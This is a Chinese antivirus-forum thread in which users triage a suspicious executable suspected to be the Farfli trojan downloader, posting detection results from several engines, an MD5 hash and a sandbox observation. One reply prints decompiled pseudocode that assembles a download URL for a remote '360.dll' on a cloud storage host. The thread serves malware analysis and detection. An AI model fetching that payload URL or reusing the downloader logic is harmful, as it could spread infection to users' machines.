查看: 1672|回复: 19
收起左侧

[可疑文件] 疑似Farfli

[复制链接]
wwwab
发表于 2024-2-23 19:53:17 | 显示全部楼层 |阅读模式

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
anthonyqian
发表于 2024-2-23 20:06:09 | 显示全部楼层
ESET 扫描Missed
DisaPDB
发表于 2024-2-23 20:12:02 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-2-24 14:18 编辑

360 鉴定 白


  1. v2 = (HWND *)this;
  2.   v23 = (int)this;
  3.   DlgItem = CWnd::GetDlgItem(this, 1005);
  4.   v24 = (int)DlgItem;
  5.   if ( (int)wParam > 100 )
  6.     return CWnd::Default((CWnd *)v2);
  7.   SendMessageW(*((HWND *)DlgItem + 8), 0x402u, wParam, 0);
  8.   sub_402300(v4);
  9.   if ( ++wParam != 100 )
  10.     return CWnd::Default((CWnd *)v2);
  11.   KillTimer(v2[8], 1u);
  12.   v31 = 0;
  13.   v32 = 0;
  14.   *(_OWORD *)v30 = 0i64;
  15.   sub_402670(v30, "3602.oss-rg-china-mainland.aliyuncs.com", 0x27u);
  16.   v35 = 0;
  17.   if ( 0x7FFFFFFF - v31 < 8 )
  18.     sub_4016E0();
  19.   v5 = v30;
  20.   if ( v32 > 0xF )
  21.     v5 = (void **)v30[0];
  22.   sub_4028C0(Src, v24, v31, (int)"https://", 8u, (int)v5, v31);
  23.   LOBYTE(v35) = 1;
  24.   if ( v22 - v21 < 8 )
  25.   {
  26.     LOBYTE(v23) = 0;
  27.     v8 = (void **)sub_402760(Src, 8, v23, v21, 8u);
  28.   }
  29.   else
  30.   {
  31.     v6 = Src;
  32.     if ( v22 > 0xF )
  33.       v6 = (void **)Src[0];
  34.     v7 = (char *)v6 + v21;
  35.     v21 += 8;
  36.     memmove(v7, "/360.dll", 8u);
  37.     v7[8] = 0;
  38.     v8 = Src;
  39.     v2 = (HWND *)v23;
  40.   }
  41.   v34 = 0i64;
  42.   *(_OWORD *)v33 = 0i64;
  43.   *(_OWORD *)v33 = *(_OWORD *)v8;
  44.   v34 = *((_QWORD *)v8 + 2);
  45.   v8[4] = 0;
  46.   v8[5] = (void *)15;
  47.   *(_BYTE *)v8 = 0;
  48.   LOBYTE(v35) = 3;
  49.   if ( v22 > 0xF )
  50.   {
  51.     v9 = Src[0];
  52.     if ( v22 + 1 >= 0x1000 )
  53.     {
  54.       v9 = (void *)*((_DWORD *)Src[0] - 1);
  55.       if ( (unsigned int)(Src[0] - v9 - 4) > 0x1F )
  56.         invalid_parameter_noinfo_noreturn();
  57.     }
  58.     unknown_libname_1(v9);
  59.   }
复制代码






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
UNknownOoo
发表于 2024-2-23 20:14:16 | 显示全部楼层
本帖最后由 UNknownOoo 于 2024-2-24 12:12 编辑

火绒
扫描:MISS

X-Sec
扫描:MISS

华为乾坤
扫描:MISS


可能是干净的(?(2.24
  1. 组件: 文件反病毒
  2. 结果说明: 检测到
  3. 类型: 木马
  4. 名称: HEUR:Trojan-Downloader.Win32.Agent.gen
  5. 精确度: 启发式分析
  6. 威胁级别: 高
  7. 对象类型: 文件
  8. 对象名称: 蘑菇云V1.0.exe
  9. 对象路径: C:\Users\Administrator\Desktop
  10. 对象的 MD5: E8D8B16D57CCDE1DEBCCCF94864254C5
  11. 原因: 机器学习
  12. 数据库发布日期: 今天,2024/2/24 上午6:50:00
复制代码
tjsh
发表于 2024-2-23 20:28:53 | 显示全部楼层
本帖最后由 tjsh 于 2024-2-23 20:29 编辑

河众 Miss
微步判断Farfli
GreatMOLA
发表于 2024-2-23 20:29:33 | 显示全部楼层
呜呜哇卜

MD

Trojan:Script/Sabsik.FL.A!ml
熊小度
发表于 2024-2-23 20:45:46 | 显示全部楼层

为什么我的是TrojanDownloader:Win32/Farfli.C
病毒库:2024/2/23 18:45
Tant
发表于 2024-2-23 20:46:54 | 显示全部楼层
卡巴miss
GreatMOLA
发表于 2024-2-23 21:11:19 | 显示全部楼层
熊小度 发表于 2024-2-23 20:45
为什么我的是TrojanDownloader:Win32/Farfli.C
病毒库:2024/2/23 18:45

我这里是直接杀的压缩包。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
hipoxiaxxx + 1 ml杀小加密压缩包

查看全部评分

hansyu
发表于 2024-2-23 21:25:43 | 显示全部楼层
本帖最后由 hansyu 于 2024-2-23 21:26 编辑

ESSP 过ELG
沙箱运行有一个外联请求,点击签名沙箱内没有释放任何文件。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-2 20:16 , Processed in 0.184935 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表